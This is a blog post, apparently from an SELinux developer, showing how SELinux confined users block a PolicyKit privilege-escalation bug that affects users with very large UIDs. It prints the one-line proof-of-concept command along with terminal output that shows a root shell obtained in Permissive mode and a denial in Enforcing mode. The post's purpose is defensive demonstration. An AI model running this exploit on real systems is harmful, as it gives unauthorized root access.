Hi All,
Last month, I wrote about Xorg X server vulnerability and we have a new interesting vulnerability, now in PolicyKit.
The exploit is based on a bug in PolicyKit, which allows users with UID greater than INT_MAX to successfully execute any systemctl command.
For more info visit thehackersnews.com article.
How does SELinux handle this exploit? 🙂 Let’s see.
SELinux brings very powerful feature called confined users, which gives administrators the power to confine user entities on the system. See official Fedora documentation or Blog from Dan Walsh. This feature is not enabled out of the box and needs to be configured on SELinux enabled system.
Let’s try PoC of the exploit in Permissive mode, when SELinux security policy is not enforced:
[tester@localhost ~]$ getenforce
Permissive
[tester@localhost ~]$ id
uid=4000000000(tester) gid=1012(tester) groups=1012(tester) context=user_u:user_r:user_t:s0
[tester@localhost ~]$ systemd-run -t /bin/bash
(pkttyagent:7036): GLib-GObject-WARNING **: 15:39:20.472: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:156:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Running as unit: run-u3748.service
Press ^] three times within 1s to disconnect TTY.
[root@localhost /]# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
As you can see, using PoC I can get root access with one command. Let’s repeat it with SELinux in enforcing:
[tester@lvrabec-workstation ~]$ getenforce
Enforcing
[tester@lvrabec-workstation ~]$ id
uid=4000000000(tester) gid=1012(tester) groups=1012(tester) context=user_u:user_r:user_t:s0
[tester@lvrabec-workstation ~]$ systemd-run -t /bin/bash
(pkttyagent:7243): GLib-GObject-WARNING **: 15:42:05.436: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:156:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Failed to start transient service unit: Access denied
[tester@lvrabec-workstation ~]$ id
uid=4000000000(tester) gid=1012(tester) groups=1012(tester) context=user_u:user_r:user_t:s0
What does it mean? SELinux technology can block this exploit! Because confined user domain (user_t) cannot start systemd services!
----
time->Sun Dec 9 15:43:17 2018
type=USER_AVC msg=audit(1544366597.713:2394): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='avc: denied { start } for auid=4000000000 uid=4000000000 gid=1012 cmdline="systemd-run -t setenforce 0" scontext=user_u:user_r:user_t:s0 tcontext=system_u:system_r:init_t:s0 tclass=system permissive=0 exe="/usr/lib/systemd/systemd" sauid=0 hostname=? addr=? terminal=?
It looks like it’s the right time to confine users on your systems! 😉
Thanks @paragonsec for one-liner PoC.